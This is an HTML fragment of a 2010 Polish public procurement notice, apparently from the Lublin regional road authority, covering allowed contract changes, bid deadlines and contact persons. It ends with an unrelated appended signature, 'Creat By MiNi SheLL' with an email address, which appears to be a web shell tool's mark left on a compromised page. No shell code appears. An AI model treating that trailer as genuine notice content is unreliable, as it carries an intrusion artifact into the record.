<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na: 
1. Zmiany rozwiązań technicznych w dokumentacji projektowej  wykonania zamówienia i 
     terminu zakończenia robót:
a) Na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą być dokonywane zmiany technologii wykonywania elementów robót. Dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty.
W tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis      
 proponowanych zmian wraz z rysunkami. Projekt wymaga zatwierdzenia przez nadzór 
 autorski / projektanta /, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego.
Powyższe  zmiany nie dotyczą terminu zakończenia robót.
b) W przypadku gdy wystąpią roboty dodatkowe  nie objęte zamówieniem podstawowym  niezbędne do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i nie mające wpływu na termin zakończenia zamówienia podstawowego, Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
Zmiana będzie dotyczyć tylko zmian technicznych w dokumentacji projektowej. 
c) W przypadku gdy wystąpią roboty dodatkowe nieprzewidziane w dokumentacji projektowej lub kolizje  nie objęte zamówieniem podstawowym a konieczne do wykonania przed robotami podstawowymi Zamawiający złoży  dodatkowe zamówienie na ich wykonanie w trybie wynikającym z Ustawy Prawo Zamówień Publicznych. 
Zmiana będzie dotyczyć  zmian technicznych w dokumentacji projektowej i terminu zakończenia zamówienia podstawowego.
d)	W uzasadnionych przypadkach gdy realizacja zadania według dokumentacji technicznej i SST powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian  w  stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót.
e) W przypadku gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych nie przewidzianych w umowie, Zamawiający sporządza protokół konieczności, 
a następnie  dostarcza dokumentację projektową na te roboty.
2.  Zmiany terminu zakończenia zamówienia podstawowego 
1) Spowodowane warunkami atmosferycznymi:
a)	Klęski żywiołowe
b)	Gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają prowadzenie robót budowlanych przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów
2) Spowodowane warunkami geologicznymi, archeologicznymi 
a)	Niewybuchy, niewypały
b)	Wykopaliska archeologiczne
3.  Zmiany dotyczące zakresu robót i wynagrodzenia 
a)	nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty. 
W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących  uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia.
b)	okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia. W przypadku 
zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia ryczałtowego, w jakim wykonane roboty budowlane pozostają do całości robót wyszczególnionych w łączącej strony umowie. Zmiana wartości ustalona zostanie na podstawie kosztorysu ofertowego.
4.  Zmiany osobowe 
         a) zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne     
             spełniające warunki określone w SIWZ
         b) Zamawiający dopuszcza możliwość wyrażenia zgody na wykonywanie robót przez  podwykonawców nie wskazanych w ofercie lub zakres nie wskazany w ofercie jako planowany do powierzenia podwykonawcom. Zamiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia       
 podwykonawców wynikającej z przepisów prawa i SIWZ. 
5.  Zmiany spowodowane następującymi okolicznościami
a)	 W przypadku wystąpienia siły wyższej której strony nie mogły przewidzieć ,której nie mogły zapobiec ani której nie mogą przeciwdziałać, a która uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego ( w wersji papierowej za opłatą) pokój nr 1  lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres e-mail: rdw.lublin@zdw.lublin.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2010 godzina 11:45, miejsce: W siedzibie zamawiającego, pokój nr 5. Otwarcie ofert - godz 12:00, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający 
i Wykonawcy przekazują pisemnie - pocztą, za pomocą faksu nr (0-81) 566 02 56 lub drogą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl .
Jeżeli Zamawiający lub wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

Osoby uprawnione do porozumiewania się z wykonawcami: 
-	W sprawach technicznych - P. Tadeusz Otap, tel. (0-81) 566 13 93 w. 23, w. 25,
-	W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - P. Anna Kaczor, P. Ireneusz Król, tel. (0-81) 566-13-92, 566-13-93 w. 28.
Uwaga: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają się ubiegać o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem na numer (081) 566-02-56  lub pocztą elektroniczną na adres e-mail: rdw.lublin@zdw.lublin.pl, zawierającej podstawowe dane firmy ( nazwa, adres, numer telefonu i faksu, adres poczty elektronicznej ). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np. zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, odwołaniach dotyczących treści ogłoszenia i SIWZ, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com